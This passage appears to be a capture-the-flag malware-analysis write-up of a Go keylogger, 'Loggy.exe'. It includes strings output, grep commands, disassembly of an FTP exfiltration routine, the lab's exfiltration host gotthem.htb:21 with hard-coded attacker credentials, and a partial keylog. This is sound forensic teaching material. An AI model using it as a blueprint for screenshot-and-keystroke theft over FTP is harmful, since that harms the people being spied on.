github.com/lxn/win.setMenuItemBitmaps
github.com/lxn/win.setMenuItemInfo
github.com/lxn/win.setParent
github.com/lxn/win.setRect
github.com/lxn/win.setScrollInfo
github.com/lxn/win.setTimer
github.com/lxn/win.setWinEventHook
github.com/lxn/win.setWindowLong
github.com/lxn/win.setWindowLongPtr
github.com/lxn/win.setWindowPlacement
github.com/lxn/win.setWindowPos
github.com/lxn/win.showWindow
github.com/lxn/win.systemParametersInfo
github.com/lxn/win.trackMouseEvent
github.com/lxn/win.trackPopupMenu
github.com/lxn/win.trackPopupMenuEx
github.com/lxn/win.translateMessage
github.com/lxn/win.unhookWinEvent
github.com/lxn/win.updateWindow
github.com/lxn/win.windowFromDC
github.com/lxn/win.windowFromPoint
github.com/lxn/win.libuxtheme
github.com/lxn/win.closeThemeData
github.com/lxn/win.drawThemeBackground
github.com/lxn/win.drawThemeTextEx
github.com/lxn/win.getThemeColor
github.com/lxn/win.getThemePartSize
github.com/lxn/win.getThemeTextExtent
github.com/lxn/win.isAppThemed
github.com/lxn/win.openThemeData
github.com/lxn/win.setWindowTheme
github.com/lxn/win.libwinspool
github.com/lxn/win.deviceCapabilities
github.com/lxn/win.documentProperties
github.com/lxn/win.enumPrinters
github.com/lxn/win.getDefaultPrinter
go:itab.*github.com/hashicorp/go-multierror.Error,error
go:itab.*github.com/jlaffaye/ftp.debugWrapper,io.ReadWriteCloser
go:itab.github.com/hashicorp/go-multierror.chain,error

so thats : github.com/jlaffaye/ftp

Task 4

What dependency, expressed as a GitHub repo, supports Janice’s assertion that she thought she downloaded something that can just take screenshots?

github.com/kbinani/screenshot
This repository is a Go package for capturing screenshots in Windows.
The following references in Loggy.exe confirm its presence:
- github.com/kbinani/screenshot.Capture
- github.com/kbinani/screenshot.CaptureRect
- github.com/kbinani/screenshot.GetDisplayBounds
- github.com/kbinani/screenshot.enumDisplayMonitors

Task 5

Which function call suggests that the malware produces a file after execution?

i just filtered word write and file lol

th length %y to array or pointer to array with length %xtls: client certificate private key of type %T does not implement crypto.Signertls: either ServerName or InsecureSkipVerify must be specified in the tls.Configx509: invalid signature: parent certificate cannot sign this kind of certificatecrypto/ecdh: internal error: nistec ScalarBaseMult failed for a fixed-size inputx509: a root or intermediate certificate is not authorized to sign for this name: x509: issuer has name constraints but leaf contains unknown or unconstrained name:  (possibly because of %q while trying to verify candidate authority certificate %q)tls: downgrade attempt detected, possibly due to a MitM attack or a broken middleboxx509: signature algorithm specifies an %s public key, but have public key of type %Treflect.Value.Interface: cannot return value obtained from unexported field or methodreflect: New of type that may not be allocated in heap (possibly undefined cgo C type)x509: a root or intermediate certificate is not authorized for an extended key usage: tls: handshake hash for a client certificate requested after discarding the handshake buffertls: unsupported certificate: private key is *ed25519.PrivateKey, expected ed25519.PrivateKeyruntime: warning: IsLongPathAwareProcess failed to enable long paths; proceeding in fixup mode
runtime.profilealloc
runtime.setprofilebucket
runtime.(*mLockProfile).recordLock
runtime.(*mLockProfile).recordUnlock
runtime.(*mLockProfile).captureStack
runtime.(*mLockProfile).captureStack.func1
runtime.(*mLockProfile).store
runtime.tryRecordGoroutineProfileWB
runtime.tryRecordGoroutineProfile
runtime.(*goroutineProfileStateHolder).Load
runtime.(*goroutineProfileStateHolder).CompareAndSwap
runtime.(*goroutineProfileStateHolder).Store
runtime.doRecordGoroutineProfile
runtime.doRecordGoroutineProfile.func1
runtime.setThreadCPUProfiler
runtime.(*inlineUnwinder).fileLine
runtime.funcfile
type:.eq.runtime.mLockProfile
syscall.ReadFile
type:.eq.os.fileStat
os.fileWithoutReadFrom.Close
os.(*fileWithoutReadFrom).Close
os.fileWithoutReadFrom.Name
os.(*fileWithoutReadFrom).Name
os.fileWithoutReadFrom.Read
os.(*fileWithoutReadFrom).Read
os.fileWithoutReadFrom.SetDeadline
os.(*fileWithoutReadFrom).SetDeadline
os.fileWithoutReadFrom.SetWriteDeadline
os.(*fileWithoutReadFrom).SetWriteDeadline
os.fileWithoutReadFrom.Write
os.(*fileWithoutReadFrom).Write
os.fileWithoutReadFrom.WriteString
os.(*fileWithoutReadFrom).WriteString
os.fileWithoutReadFrom.WriteTo
os.(*fileWithoutReadFrom).WriteTo
os.fileWithoutWriteTo.Close
os.(*fileWithoutWriteTo).Close
os.fileWithoutWriteTo.Name
os.(*fileWithoutWriteTo).Name
os.fileWithoutWriteTo.Read
os.(*fileWithoutWriteTo).Read
os.fileWithoutWriteTo.ReadFrom
os.(*fileWithoutWriteTo).ReadFrom
os.fileWithoutWriteTo.SetDeadline
os.(*fileWithoutWriteTo).SetDeadline
os.fileWithoutWriteTo.SetWriteDeadline
os.(*fileWithoutWriteTo).SetWriteDeadline
os.fileWithoutWriteTo.Write
os.(*fileWithoutWriteTo).Write
os.fileWithoutWriteTo.WriteString
os.(*fileWithoutWriteTo).WriteString
internal/bisect.appendFileLine
net.goLookupIPFiles
net.(*file).close
net.parseNSSConfFile
net.parseNSSConfFile.deferwrap1
net.(*file).getLineFromData
net.(*file).readLine
net.(*file).stat
net.sendFile
os.(*File).Fd
syscall.NsecToFiletime
main.sendFilesViaFTP
main.isScreenshotFile
main.sendFilesViaFTP.Printf.func7
main.sendFilesViaFTP.deferwrap3
main.sendFilesViaFTP.Printf.func6
main.sendFilesViaFTP.Printf.func5
main.sendFilesViaFTP.Printf.func4
main.sendFilesViaFTP.deferwrap2
main.sendFilesViaFTP.Printf.func3
main.sendFilesViaFTP.Printf.func2
main.sendFilesViaFTP.deferwrap1
main.sendFilesViaFTP.Printf.func1
C:/Program Files/Go/src/internal/abi/type.go
C:/Program Files/Go/src/internal/cpu/cpu.go
C:/Program Files/Go/src/internal/cpu/cpu_x86.go
C:/Program Files/Go/src/internal/cpu/cpu_x86.s
C:/Program Files/Go/src/runtime/internal/sys/intrinsics.go
C:/Program Files/Go/src/internal/bytealg/count_native.go
C:/Program Files/Go/src/internal/bytealg/index_amd64.go
C:/Program Files/Go/src/internal/bytealg/compare_amd64.s
C:/Program Files/Go/src/internal/bytealg/count_amd64.s
C:/Program Files/Go/src/internal/bytealg/equal_amd64.s
C:/Program Files/Go/src/internal/bytealg/index_amd64.s
C:/Program Files/Go/src/internal/bytealg/indexbyte_amd64.s
C:/Program Files/Go/src/internal/chacha8rand/chacha8.go
C:/Program Files/Go/src/internal/chacha8rand/chacha8_amd64.s
C:/Program Files/Go/src/runtime/float.go
C:/Program Files/Go/src/runtime/iface.go
C:/Program Files/Go/src/runtime/netpoll.go
C:/Program Files/Go/src/runtime/select.go
C:/Program Files/Go/src/runtime/alg.go
C:/Program Files/Go/src/runtime/typekind.go
C:/Program Files/Go/src/runtime/stubs.go
C:/Program Files/Go/src/runtime/arena.go
C:/Program Files/Go/src/runtime/mheap.go
C:/Program Files/Go/src/runtime/internal/atomic/types.go
C:/Program Files/Go/src/runtime/mem.go
C:/Program Files/Go/src/runtime/mem_windows.go
C:/Program Files/Go/src/runtime/lockrank_off.go
C:/Program Files/Go/src/runtime/lock_sema.go
C:/Program Files/Go/src/runtime/runtime2.go
C:/Program Files/Go/src/runtime/mwbbuf.go
C:/Program Files/Go/src/runtime/atomic_pointer.go
C:/Program Files/Go/src/runtime/os_windows.go
C:/Program Files/Go/src/runtime/cgocall.go
C:/Program Files/Go/src/runtime/proc.go
C:/Program Files/Go/src/runtime/runtime1.go
C:/Program Files/Go/src/runtime/chan.go
C:/Program Files/Go/src/runtime/cpuflags_amd64.go
C:/Program Files/Go/src/runtime/debug.go
C:/Program Files/Go/src/runtime/debugcall.go
C:/Program Files/Go/src/runtime/symtab.go
C:/Program Files/Go/src/runtime/defs_windows_amd64.go
C:/Program Files/Go/src/runtime/env_posix.go
C:/Program Files/Go/src/runtime/error.go
C:/Program Files/Go/src/runtime/traceback.go
C:/Program Files/Go/src/runtime/exithook.go
C:/Program Files/Go/src/runtime/extern.go
C:/Program Files/Go/src/runtime/hash64.go
C:/Program Files/Go/src/runtime/histogram.go
C:/Program Files/Go/src/runtime/metrics.go
C:/Program Files/Go/src/runtime/type.go
C:/Program Files/Go/src/internal/abi/switch.go
C:/Program Files/Go/src/runtime/rand.go
C:/Program Files/Go/src/runtime/lfstack.go
C:/Program Files/Go/src/runtime/tagptr_64bit.go
C:/Program Files/Go/src/runtime/time_nofake.go
C:/Program Files/Go/src/runtime/lockrank.go
C:/Program Files/Go/src/runtime/malloc.go
C:/Program Files/Go/src/runtime/mfixalloc.go
C:/Program Files/Go/src/runtime/mcache.go
C:/Program Files/Go/src/runtime/fastlog2.go
C:/Program Files/Go/src/runtime/map.go
C:/Program Files/Go/src/runtime/msize_allocheaders.go
C:/Program Files/Go/src/runtime/map_fast32.go
C:/Program Files/Go/src/runtime/map_fast64.go
C:/Program Files/Go/src/runtime/map_faststr.go
C:/Program Files/Go/src/runtime/mbarrier.go
C:/Program Files/Go/src/internal/abi/abi.go
C:/Program Files/Go/src/runtime/mbitmap.go
C:/Program Files/Go/src/runtime/mbitmap_allocheaders.go
C:/Program Files/Go/src/runtime/mcentral.go
C:/Program Files/Go/src/runtime/trace2runtime.go
C:/Program Files/Go/src/runtime/mgcsweep.go
C:/Program Files/Go/src/runtime/mcheckmark.go
C:/Program Files/Go/src/runtime/mgc.go
C:/Program Files/Go/src/runtime/mfinal.go
C:/Program Files/Go/src/runtime/sema.go
C:/Program Files/Go/src/runtime/mgcwork.go
C:/Program Files/Go/src/runtime/mprof.go
C:/Program Files/Go/src/runtime/mstats.go
C:/Program Files/Go/src/runtime/print.go
C:/Program Files/Go/src/runtime/mgcpacer.go
C:/Program Files/Go/src/runtime/mgclimit.go
C:/Program Files/Go/src/runtime/mgcmark.go
C:/Program Files/Go/src/runtime/stack.go
C:/Program Files/Go/src/runtime/mgcstack.go
C:/Program Files/Go/src/runtime/string.go
C:/Program Files/Go/src/runtime/mgcscavenge.go
C:/Program Files/Go/src/runtime/time.go
C:/Program Files/Go/src/runtime/mranges.go
C:/Program Files/Go/src/runtime/mpagealloc.go
C:/Program Files/Go/src/runtime/mpallocbits.go
C:/Program Files/Go/src/runtime/mpagecache.go
C:/Program Files/Go/src/runtime/mpagealloc_64bit.go
C:/Program Files/Go/src/runtime/mspanset.go
C:/Program Files/Go/src/runtime/netpoll_windows.go
C:/Program Files/Go/src/runtime/preempt.go
C:/Program Files/Go/src/runtime/pagetrace_off.go
C:/Program Files/Go/src/runtime/panic.go
C:/Program Files/Go/src/runtime/signal_windows.go
C:/Program Files/Go/src/runtime/pinner.go
C:/Program Files/Go/src/runtime/symtabinl.go
C:/Program Files/Go/src/runtime/write_err.go
C:/Program Files/Go/src/runtime/runtime.go
C:/Program Files/Go/src/runtime/rwmutex.go
C:/Program Files/Go/src/runtime/trace2.go
C:/Program Files/Go/src/runtime/sigqueue.go
C:/Program Files/Go/src/runtime/slice.go
C:/Program Files/Go/src/runtime/sys_x86.go
C:/Program Files/Go/src/runtime/stkframe.go
C:/Program Files/Go/src/runtime/syscall_windows.go
C:/Program Files/Go/src/runtime/trace2buf.go
C:/Program Files/Go/src/runtime/trace2time.go
C:/Program Files/Go/src/runtime/trace2status.go
C:/Program Files/Go/src/runtime/trace2event.go
C:/Program Files/Go/src/runtime/trace2map.go
C:/Program Files/Go/src/runtime/trace2region.go
C:/Program Files/Go/src/runtime/trace2stack.go
C:/Program Files/Go/src/runtime/trace2string.go
C:/Program Files/Go/src/runtime/unsafe.go
C:/Program Files/Go/src/runtime/utf8.go
C:/Program Files/Go/src/runtime/asm.s
C:/Program Files/Go/src/runtime/asm_amd64.s
C:/Program Files/Go/src/runtime/duff_amd64.s
C:/Program Files/Go/src/runtime/memclr_amd64.s
C:/Program Files/Go/src/runtime/memmove_amd64.s
C:/Program Files/Go/src/runtime/preempt_amd64.s
C:/Program Files/Go/src/runtime/rt0_windows_amd64.s
C:/Program Files/Go/src/runtime/sys_windows_amd64.s
C:/Program Files/Go/src/runtime/time_windows_amd64.s
C:/Program Files/Go/src/runtime/zcallback_windows.s
C:/Program Files/Go/src/sync/atomic/type.go
C:/Program Files/Go/src/sync/atomic/value.go
C:/Program Files/Go/src/internal/reflectlite/swapper.go
C:/Program Files/Go/src/internal/reflectlite/type.go
C:/Program Files/Go/src/internal/reflectlite/value.go
C:/Program Files/Go/src/errors/wrap.go
C:/Program Files/Go/src/errors/errors.go
C:/Program Files/Go/src/sort/slice.go
C:/Program Files/Go/src/sort/sort.go
C:/Program Files/Go/src/sort/sort_impl_go121.go
C:/Program Files/Go/src/slices/sort.go
C:/Program Files/Go/src/sort/zsortfunc.go
C:/Program Files/Go/src/sort/zsortinterface.go
C:/Program Files/Go/src/cmp/cmp.go
C:/Program Files/Go/src/slices/zsortordered.go
C:/Program Files/Go/src/math/exp_amd64.go
C:/Program Files/Go/src/math/abs.go
C:/Program Files/Go/src/math/bits.go
C:/Program Files/Go/src/math/frexp.go
C:/Program Files/Go/src/math/unsafe.go
C:/Program Files/Go/src/math/log.go
C:/Program Files/Go/src/math/log10.go
C:/Program Files/Go/src/math/log_amd64.s
C:/Program Files/Go/src/unicode/utf8/utf8.go
C:/Program Files/Go/src/strconv/atoi.go
C:/Program Files/Go/src/strconv/quote.go
C:/Program Files/Go/src/strconv/itoa.go
C:/Program Files/Go/src/strconv/decimal.go
C:/Program Files/Go/src/strconv/ftoa.go
C:/Program Files/Go/src/strconv/ftoaryu.go
C:/Program Files/Go/src/math/bits/bits.go
C:/Program Files/Go/src/strconv/bytealg.go
C:/Program Files/Go/src/sync/map.go
C:/Program Files/Go/src/sync/mutex.go
C:/Program Files/Go/src/sync/once.go
C:/Program Files/Go/src/sync/pool.go
C:/Program Files/Go/src/sync/poolqueue.go
Files/Go/src/vendor/golang.org/x/crypto/internal/poly1305/poly1305.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/internal/poly1305/sum_amd64.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/internal/poly1305/bits_go1.13.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/internal/poly1305/sum_generic.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/internal/poly1305/sum_amd64.s
C:/Program Files/Go/src/vendor/golang.org/x/crypto/chacha20poly1305/chacha20poly1305_amd64.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/chacha20poly1305/chacha20poly1305.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/chacha20poly1305/chacha20poly1305_generic.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/chacha20poly1305/chacha20poly1305_amd64.s
C:/Program Files/Go/src/vendor/golang.org/x/crypto/hkdf/hkdf.go
C:/Program Files/Go/src/crypto/tls/alert.go
C:/Program Files/Go/src/crypto/tls/auth.go
C:/Program Files/Go/src/crypto/tls/cache.go
C:/Program Files/Go/src/crypto/tls/cipher_suites.go
C:/Program Files/Go/src/crypto/tls/conn.go
C:/Program Files/Go/src/crypto/tls/common.go
C:/Program Files/Go/src/crypto/tls/common_string.go
C:/Program Files/Go/src/crypto/tls/quic.go
C:/Program Files/Go/src/crypto/tls/prf.go
C:/Program Files/Go/src/crypto/tls/key_schedule.go
C:/Program Files/Go/src/crypto/tls/handshake_client.go
C:/Program Files/Go/src/crypto/tls/handshake_client_tls13.go
C:/Program Files/Go/src/crypto/tls/handshake_messages.go
C:/Program Files/Go/src/crypto/tls/key_agreement.go
C:/Program Files/Go/src/crypto/tls/ticket.go
C:/Program Files/Go/src/crypto/tls/tls.go
C:/Program Files/Go/src/net/textproto/pipeline.go
C:/Program Files/Go/src/net/textproto/reader.go
C:/Program Files/Go/src/net/textproto/textproto.go
C:/Program Files/Go/src/net/textproto/writer.go
C:/Program Files/Go/src/runtime/runtime-gdb.py
WriteFile
CreateFileA
runtime.profilealloc
runtime.setprofilebucket
runtime.(*mLockProfile).recordLock
runtime.(*mLockProfile).recordUnlock
runtime.(*mLockProfile).captureStack
runtime.(*mLockProfile).captureStack.func1
runtime.(*mLockProfile).store
runtime.tryRecordGoroutineProfileWB
runtime.tryRecordGoroutineProfile
runtime.doRecordGoroutineProfile
runtime.doRecordGoroutineProfile.func1
runtime.setThreadCPUProfiler
runtime.funcfile
type:.eq.runtime.mLockProfile
syscall.setFilePointerEx
syscall.FindFirstFile
syscall.CreateFile
syscall.findFirstFile1
syscall.FlushFileBuffers
syscall.GetFileAttributesEx
syscall.GetFileInformationByHandle
syscall.GetFileType
syscall.readFile
syscall.SetFileCompletionNotificationModes
syscall.writeFile
syscall.TransmitFile
io/fs.FileMode.String
io/fs.FileMode.IsDir
io/fs.FileMode.Type
io/fs.(*FileMode).IsDir
io/fs.(*FileMode).String
io/fs.(*FileMode).Type
internal/syscall/windows.GetFileInformationByHandleEx
internal/syscall/windows.GetModuleFileName
internal/poll.checkSetFileCompletionNotificationModes
internal/poll.SendFile
internal/poll.SendFile.deferwrap1
internal/poll.SendFile.func1
os.(*File).ReadDir
os.(*File).readdir
os.getModuleFileName
os.(*File).Name
os.(*File).Read
os.(*File).ReadFrom
os.(*File).Write
os.(*File).WriteTo
os.(*File).WriteString
os.OpenFile
os.(*File).wrapErr
os.(*File).SetDeadline
os.(*File).SetWriteDeadline
os.(*File).Close
os.(*File).Sync
os.(*File).setDeadline
os.(*File).setWriteDeadline
os.newFile
os.openFileNolog
os.(*file).close
os.(*File).Stat
os.(*fileStat).Name
os.(*fileStat).IsDir
os.newFileStatFromGetFileInformationByHandle
os.(*fileStat).Size
os.(*fileStat).ModTime
os.(*fileStat).saveInfoFromPath
type:.eq.os.fileStat
os.fileWithoutReadFrom.Close
os.(*fileWithoutReadFrom).Close
os.fileWithoutReadFrom.Name
os.(*fileWithoutReadFrom).Name
os.fileWithoutReadFrom.Read
os.(*fileWithoutReadFrom).Read
os.fileWithoutReadFrom.SetDeadline
os.(*fileWithoutReadFrom).SetDeadline
os.fileWithoutReadFrom.SetWriteDeadline
os.(*fileWithoutReadFrom).SetWriteDeadline
os.fileWithoutReadFrom.Write
os.(*fileWithoutReadFrom).Write
os.fileWithoutReadFrom.WriteString
os.(*fileWithoutReadFrom).WriteString
os.fileWithoutReadFrom.WriteTo
os.(*fileWithoutReadFrom).WriteTo
os.fileWithoutWriteTo.Close
os.(*fileWithoutWriteTo).Close
os.fileWithoutWriteTo.Name
os.(*fileWithoutWriteTo).Name
os.fileWithoutWriteTo.Read
os.(*fileWithoutWriteTo).Read
os.fileWithoutWriteTo.ReadFrom
os.(*fileWithoutWriteTo).ReadFrom
os.fileWithoutWriteTo.SetDeadline
os.(*fileWithoutWriteTo).SetDeadline
os.fileWithoutWriteTo.SetWriteDeadline
os.(*fileWithoutWriteTo).SetWriteDeadline
os.fileWithoutWriteTo.Write
os.(*fileWithoutWriteTo).Write
os.fileWithoutWriteTo.WriteString
os.(*fileWithoutWriteTo).WriteString
net.goLookupIPFiles
net.parseNSSConfFile
net.parseNSSConfFile.deferwrap1
net.(*file).close
net.(*file).getLineFromData
net.(*file).readLine
net.(*file).stat
net.sendFile
main.sendFilesViaFTP
main.sendFilesViaFTP.Printf.func7
main.sendFilesViaFTP.deferwrap3
main.sendFilesViaFTP.Printf.func6
main.sendFilesViaFTP.Printf.func5
main.sendFilesViaFTP.Printf.func4
main.sendFilesViaFTP.deferwrap2
main.sendFilesViaFTP.Printf.func3
main.sendFilesViaFTP.Printf.func2
main.sendFilesViaFTP.deferwrap1
main.sendFilesViaFTP.Printf.func1
main.logFile
os.allowReadDirFileID
runtime.blockprofilerate
runtime.mutexprofilerate
runtime.MemProfileRate
runtime.goroutineProfile
runtime.longFileName
runtime.profiletimer
internal/syscall/windows.procGetFileInformationByHandleEx
internal/syscall/windows.procGetModuleFileNameW
syscall.procSetFilePointerEx
syscall.procCreateFileW
syscall.procFindFirstFileW
syscall.procFlushFileBuffers
syscall.procGetFileAttributesExW
syscall.procGetFileInformationByHandle
syscall.procGetFileType
syscall.procReadFile
syscall.procSetFileCompletionNotificationModes
syscall.procWriteFile
syscall.procTransmitFile
internal/poll.ErrFileClosing
internal/poll.useSetFileCompletionNotificationModes
net.hostsFilePath
github.com/lxn/win.getOpenFileName
github.com/lxn/win.getSaveFileName
github.com/lxn/win.closeEnhMetaFile
github.com/lxn/win.copyEnhMetaFile
github.com/lxn/win.createEnhMetaFile
github.com/lxn/win.deleteEnhMetaFile
github.com/lxn/win.getEnhMetaFile
github.com/lxn/win.getEnhMetaFileHeader
github.com/lxn/win.playEnhMetaFile
github.com/lxn/win.gdipCreateBitmapFromFile
github.com/lxn/win.fileTimeToSystemTime
github.com/lxn/win.getProfileString
github.com/lxn/win.systemTimeToFileTime
github.com/lxn/win.dragAcceptFiles
github.com/lxn/win.dragQueryFile
github.com/lxn/win.shGetFileInfo
go:itab.*os.File,io.Reader
go:itab.*os.File,io.Writer
go:itab.*os.fileStat,io/fs.FileInfo
go:itab.os.fileWithoutWriteTo,io.Reader
go:itab.os.fileWithoutReadFrom,io.Writer
 
┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ strings Loggy.exe | grep -i "writefile"
 
, size = bad prune, tail = recover:  not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=rwxrwxrwxFindCloseLocalFreeMoveFileWWriteFileWSASendTotlsrsakex%s %x %x
syscall.WriteFile
syscall.writeFile
WriteFile
syscall.writeFile
syscall.procWriteFile

Task 6

You observe that the malware is exfiltrating data over FTP. What is the domain it is exfiltrating data to?

so i filtered out port number 21 as the ftp port is port 21 :

┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ strings Loggy.exe | grep  ":21"
	sched={pc:, gp->status= pluginpath= runtime: pid=: unknown pc  called from dalTLDpSugct?GetTempPath2Wlevel 3 resetsrmount errortimer expiredexchange fullCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameRegDeleteKeyWRegEnumValueWtlsmaxrsasizeaccess denieduser canceledPKCS1WithSHA1ECDSAWithSHA1CLIENT_RANDOMlame referralCreateRectRgnCreateActCtxWCoTaskMemFreeOleInitializePdhCloseQueryAnimateWindowDrawFocusRectGetMenuItemIDGetScrollInfoGetSystemMenuSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWgocacheverifyinstallgoroothtml/templateinvalid ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSemail addressname too longDeleteServiceGetDriveTypeWThread32FirstRtlGetVersionRtlInitStringExitWindowsExWTSFreeMemoryempty integerunsupported:  in host namegotthem.htb:21not a PNG fileComputerNameEx: extra text: ControlServiceOpenSCManagerWRegSetValueExWCreateProcessWDwmEnableMMCSSDwmShowContactGetStockObjectGetPixelFormatSetPixelFormatGdiplusStartupSizeofResourceModule32FirstWGetSystemTimesVirtualAllocExCoInitializeExCoUninitializeSysAllocStringwglMakeCurrentDragQueryFileWDragQueryPointDefWindowProcWSetWindowTextWGetWindowTextWScreenToClientSetWindowLongWGetWindowLongWInvalidateRectReleaseCaptureClientToScreenCloseClipboardEmptyClipboardCallNextHookExinvalid syntax1907348632812595367431640625unexpected EOFunsafe.Pointer on zero Valueunknown methoduserArenaStateread mem statsallocfreetracegcstoptheworldGC assist waitfinalizer waitsync.Cond.Waits.allocCount= nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod

Task 7

What are the threat actor’s credentials?

With the function “main.SendFilesViaFTP”, we observe that the attacker’s credentials have been recorded.

005f3a40  4c8da424f0feffff   lea     r12, [rsp-0x110 {var_110}]
005f3a48  4d3b6610           cmp     r12 {var_110}, qword [r14+0x10]
005f3a4c  0f86ea070000       jbe     0x5f423c
 
005f3a52  55                 push    rbp {__saved_rbp}
005f3a53  4889e5             mov     rbp, rsp {__saved_rbp}
005f3a56  4881ec88010000     sub     rsp, 0x188
005f3a5d  488d05ebe10500     lea     rax, [rel data_651ba6[0xa9]]  {"gotthem.htb:21not a PNG fileComp…"}
005f3a64  bb0e000000         mov     ebx, 0xe
005f3a69  31c9               xor     ecx, ecx  {0x0}
005f3a6b  31ff               xor     edi, edi  {0x0}
005f3a6d  4889fe             mov     rsi, rdi  {0x0}
005f3a70  e86bcbfeff         call    github.com/jlaffaye/ftp.Dial
005f3a75  4885db             test    rbx, rbx  {0xe}
005f3a78  0f84b5000000       je      0x5f3b33  {0x0}
 
005f3a7e  440f11bc24300100…  movups  xmmword [rsp+0x130 {var_60}], xmm15
005f3a87  7404               je      0x5f3a8d  {0x0}
 
005f3a89  488b5b08           mov     rbx, qword [rbx+0x8]  {0x16}
 
005f3a8d  48899c2430010000   mov     qword [rsp+0x130 {var_60}], rbx
005f3a95  48898c2438010000   mov     qword [rsp+0x138 {var_60+0x8}], rcx
005f3a9d  440f11bc24400100…  movups  xmmword [rsp+0x140 {var_50}], xmm15
005f3aa6  440f11bc24500100…  movups  xmmword [rsp+0x150 {var_40_1}], xmm15
005f3aaf  440f11bc24600100…  movups  xmmword [rsp+0x160 {var_30_1}], xmm15
005f3ab8  488d15010b0000     lea     rdx, [rel main.sendFilesViaFTP.Printf.func1]
005f3abf  4889942440010000   mov     qword [rsp+0x140 {var_50}], rdx  {main.sendFilesViaFTP.Printf.func1}
005f3ac7  48c7842450010000…  mov     qword [rsp+0x150 {var_40_1}], 0x23
005f3ad3  488d151f860600     lea     rdx, [rel data_65c093[0x66]]  {"Failed to connect to FTP server:…"}
005f3ada  4889942448010000   mov     qword [rsp+0x148 {var_50+0x8}], rdx  {data_65c093[0x66], "Failed to connect to FTP server:…"}
005f3ae2  48c7842460010000…  mov     qword [rsp+0x160 {var_30_1}], 0x1
005f3aee  48c7842468010000…  mov     qword [rsp+0x168 {var_30_1+0x8}], 0x1
005f3afa  488d942430010000   lea     rdx, [rsp+0x130 {var_60}]
005f3b02  4889942458010000   mov     qword [rsp+0x158 {var_40_1+0x8}], rdx {var_60}
005f3b0a  488b0517302200     mov     rax, qword [rel log.std]
005f3b11  31db               xor     ebx, ebx  {0x0}
005f3b13  b902000000         mov     ecx, 0x2
005f3b18  488dbc2440010000   lea     rdi, [rsp+0x140 {var_50}]
005f3b20  e8bbd7eeff         call    log.(*Logger).output
005f3b25  e85646e4ff         call    runtime.deferreturn
005f3b2a  4881c488010000     add     rsp, 0x188
005f3b31  5d                 pop     rbp {__saved_rbp}
005f3b32  c3                 retn     {__return_addr}
 
005f3b33  48898424b8000000   mov     qword [rsp+0xb8 {var_d8}], rax
005f3b3b  440f11bc24200100…  movups  xmmword [rsp+0x120 {var_70}], xmm15
005f3b44  488d0d150a0000     lea     rcx, [rel main.sendFilesViaFTP.deferwrap1]
005f3b4b  48898c2420010000   mov     qword [rsp+0x120 {var_70}], rcx  {main.sendFilesViaFTP.deferwrap1}
005f3b53  4889842428010000   mov     qword [rsp+0x128 {var_70+0x8}], rax
005f3b5b  488d8c2420010000   lea     rcx, [rsp+0x120 {var_70}]
005f3b63  48898c2488000000   mov     qword [rsp+0x88 {var_108}], rcx {var_70}
005f3b6b  488d442470         lea     rax, [rsp+0x70 {var_120}]
005f3b70  e88b40e4ff         call    runtime.deferprocStack
005f3b75  85c0               test    eax, eax
005f3b77  0f85d5030000       jne     0x5f3f52  {0x0}
 
005f3b7d  488b8424b8000000   mov     rax, qword [rsp+0xb8 {var_d8}]
005f3b85  488d1d9ccc0500     lea     rbx, [rel data_6507c3[0x65]]  {"NottaHacker/dev/stdout/dev/stder…"}
005f3b8c  b90b000000         mov     ecx, 0xb
005f3b91  488d3d7ff80500     lea     rdi, [rel data_6533c6[0x51]]  {"Cle@rtextP@ssword0123456789ABCDE…"}
005f3b98  be11000000         mov     esi, 0x11
005f3b9d  0f1f00             nop     dword [rax]
005f3ba0  e83bd8feff         call    github.com/jlaffaye/ftp.(*ServerConn).Login
005f3ba5  4885c0             test    rax, rax
005f3ba8  0f84b5000000       je      0x5f3c63
 
005f3bae  440f11bc24100100…  movups  xmmword [rsp+0x110 {var_80}], xmm15
005f3bb7  7404               je      0x5f3bbd

Task 8

What file keeps getting written to disk?

Keylog.txt

Task 9

When Janice changed her password, this was captured in a file. What is Janice’s username and password?

[KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] U U U U S S S E E E E E R R R R N N N N A A A A A M M M M M E E E [SHIFT] [KEYCODE 160] [SHIFT] 